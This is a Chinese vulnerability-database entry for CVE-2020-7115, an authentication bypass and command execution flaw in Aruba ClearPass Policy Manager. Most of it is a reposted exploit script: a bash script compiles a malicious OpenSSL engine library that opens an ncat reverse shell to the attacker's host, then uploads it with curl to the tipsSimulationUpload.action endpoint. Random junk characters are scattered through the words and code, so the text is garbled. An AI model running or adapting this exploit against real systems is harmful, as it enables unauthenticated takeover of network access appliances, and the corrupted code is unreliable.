Aruba Networks ClearPass Policy Manager 安全漏洞

漏洞ID 2049794 漏洞类型 访问控制错误
发布时间 2020-07-11 更新时间 2020-07-11
Aruba Networks ClearPass Policy Manager 安全漏洞CVE编号 CVE-2020-7115

Aruba Networks ClearPass Policy Manager 安全漏洞CNNVD-ID CNNVD-202006-316
漏洞平台. j [ # ` N/A CVSS评分 NG 5 [/A
|漏洞来源
https://cxsecurity.com/8 b K %issue/WLB-2020070046
http://www.cnnvd.org.cn/web/7 l M W D b V txxk/ldxqById.tag?CNNVD=CNNVD-202006-316
|漏洞详情
Aruba Networks Cleat O 8 ` F 4rPass是美国安移通网络(Aruba Networks)公司的一套集成了网络控制功能、应用和设备管理功能的接入管理系统。Policy Mana~ F 7 Z I K 5 C yger是其中的一个策略管理器。
Aruba Networks C2 k o ^ flearPass Policy Manager中的Web接口存在安全漏洞。攻击者可利用该漏洞绕过身份验证并执行命令。
|漏洞EXP
# Exploit Title: Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution
# Date: 2020-07-06
# Exploit Authorf R _ u 4 { I ` D: SpicyItalian
# Vendor Homepage: https://www.arubN # 0anetworks.com/products/security/network-access-control/
# Version: ClearPass 6.7.x prior to 6.7.13-H& @ j % K u 5 t KF, ClearPass 6.8.xv i % k ` 9 prior to 6.8.5-HF, ClearPass 6.9.x prior to 6.9.1J 1 C
# Tested on: ClearPass 6.7o x 4 ? . g .0
# CVE: CVE-2020-7115
Use of RHEL/CentOS 7.x is recommended to successfully generate the malicious OpenSSL engine.
#!/usr/bin/env bax / q #sh
if [ "$#" -ne 4 ]; then
echo "Usage: `basename $0` [rE p )emote host] [remote port] [local host]& 8 p 4 B B z [local port]"
exit 0
fi
cat <<EOF >>pX 6 Z W m cayload.c
#inc, # G K Y g Rlude <unistd.h>
__attribute__((constructor))
static void init() {
exW o A ; I M Z )ecl("/bin/sh] F j", "sh", "-c", "rm -f /tmp/8 & $ h 7 / H ; FclientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL);
}
EOF
gcc -y ~ Z nfPIC -c payload.c
gcc -shared -o~ 3 f = G payload.so -lcrypto payload.o
rm -f payload.c payload.o
curl -X POST -F 'cli} j , z 8 jentPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUplo( R U $ Ead.action &>/dev/null &
cat <<"EOF"
/(
 !
| ) `.
| `.) ,-,--
( / /
`'-.,;_/
`----
EOF
printf "nPleasea waita for your sk P Mpicy shell...nn"
ncat -v -l $3 $4
|参考资料

t W ,源:MISC

链接:https://www.arubanetworks.com/assets/alert/An h dRUBA-PSA-2020-005.txt

来源:nvd.nist.t + 9 |gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2020-7115